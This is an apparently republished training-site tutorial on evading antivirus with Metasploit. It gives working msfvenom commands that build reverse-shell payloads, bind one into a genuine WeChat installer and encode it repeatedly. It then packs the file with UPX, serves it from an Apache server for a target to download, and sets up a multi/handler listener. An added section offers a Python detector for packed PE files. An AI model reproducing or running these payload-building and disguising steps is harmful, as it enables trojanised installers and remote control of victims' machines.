Bypassing Antivirus with Metasploit: Build, Encode, and Pack a Windows Payload

This guide explains how to create a Windows payload, evade antivirus detection using Metasploit encoders and UPX packing, host the malicious file on a Kali Apache server, test it with VirusTotal, and establish a reverse shell listener for successful exploitation.

MaGe Linux Operations

1. Bare Payload Generation

Generate an unmodified Windows payload ("bare horse") with:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=8888 -f exe > weixin.exe

Deploy Kali's Apache service, place weixin.exe in /var/www/html, and download it from the target machine via http://192.168.111.132/weixin.exe. In this unmodified state the file is detected by AV.

Test the payload with online multi‑engine scanners such as VirusTotal to verify detection status.

2. Metasploit Encoding

List available encoders with msfvenom -l encoders. Choose a template (e.g., the genuine WeChat installer) and bind the payload using the x86/shikata_ga_nai encoder, repeating the encoding 12 times for stronger evasion:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9999 -e x86/shikata_ga_nai -x WeChatSetup.exe -i 12 -f exe -o /root/WeChatSetup1.exe

Explanation of parameters:

-e specifies the encoder, -x the executable template, -i the number of encoding iterations, -f the output format, and -o the output path.

Place the resulting WeChatSetup1.exe in the Apache directory for the target to download, then configure a listener on Metasploit:

use exploit/multi/handler
set payload windows/shell_reverse_tcp
set LHOST 192.168.111.132
set LPORT 9999
run

The target executes the forged installer; although the original installer no longer functions once the payload has been bound into it, the payload runs and the reverse shell connects.

3. UPX Packing

UPX both compresses and packs an executable, which alters its signature. View the options with upx --help and pack the file simply with upx WeChatSetup1.exe, which reduces its size and changes its characteristics.

Host the packed file on Apache, let the target download it, and the listener on Metasploit receives a successful session.
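The UPX step above changes which sections the executable carries and how their bytes are distributed, and that is exactly what a defender's triage script can key on. The following Python script is an added example, not code from the original article or from the UPX or Metasploit projects: it walks the PE section headers with the standard library only, flags UPX section names and any section whose byte entropy is near that of compressed data (the 7.0-bit threshold is an assumed cut-off), and exercises itself on two constructed PE skeletons that are headers plus sections only, not real programs.

```python
import math
import struct

def shannon_entropy(data):
    """Bits per byte: near 8.0 for compressed or encrypted data, much lower for code."""
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / len(data) * math.log2(c / len(data)) for c in counts if c)

def pe_sections(blob):
    """Yield (section name, raw bytes) by walking the DOS, COFF and section headers."""
    if blob[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", blob, coff)
    for i in range(nsec):
        name, _, _, raw_size, raw_ptr = struct.unpack_from("<8sIIII", blob, coff + 20 + opt_size + 40 * i)
        yield name.rstrip(b"\0").decode("ascii", "replace"), blob[raw_ptr:raw_ptr + raw_size]

def packer_indicators(blob, threshold=7.0):
    """Signals a triage script would log: UPX section names and high-entropy sections."""
    names, hot = [], []
    for name, raw in pe_sections(blob):
        names.append(name)
        if raw and shannon_entropy(raw) >= threshold:
            hot.append(name)
    upx = [n for n in names if n.upper().startswith("UPX")]
    return {"sections": names, "upx_names": upx, "high_entropy": hot,
            "likely_packed": bool(upx or hot)}

def build_sample_pe(sections):
    """Constructed minimal PE (headers plus sections, not a runnable program) for testing."""
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)      # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0)  # no optional header
    ptr = 0x40 + 4 + 20 + 40 * len(sections)                             # first raw data offset
    hdrs, bodies = [], []
    for name, raw in sections:
        hdrs.append(struct.pack("<8sIIIIIIHHI", name, len(raw), 0x1000, len(raw), ptr, 0, 0, 0, 0, 0))
        bodies.append(raw)
        ptr += len(raw)
    return dos + b"PE\0\0" + coff + b"".join(hdrs) + b"".join(bodies)

# Constructed samples: a UPX-style layout whose body uses every byte value equally (entropy 8.0,
# as compressed data does) beside a plain layout with repetitive code-like and text bytes.
PACKED = build_sample_pe([(b"UPX0", b""), (b"UPX1", bytes(range(256)) * 16)])
CLEAN = build_sample_pe([(b".text", b"\x55\x8b\xec\x90" * 1024), (b".data", b"hello world\0" * 256)])
```

Section names are trivially renamed by packer options, so the entropy signal is the one worth keeping in a detection rule; the name match is a cheap first pass.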

Conclusion

Antivirus evasion techniques evolve rapidly, prompting a continuous arms race between attackers and security vendors. Future work includes exploring evasion using Python and Go binaries.

Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact admin@besthub.dev and we will review it promptly.

Tags: Metasploit, upx, reverse shell, antivirus evasion, msfvenom, payload encoding

Written by

MaGe Linux Operations

Founded in 2009, MaGe Education is a top Chinese high‑end IT training brand. Its graduates earn 12K+ RMB salaries, and the school has trained tens of thousands of students. It offers high‑pay courses in Linux cloud operations, Python full‑stack, automation, data analysis, AI, and Go high‑concurrency architecture. Thanks to quality courses and a solid reputation, it has talent partnerships with numerous internet firms.
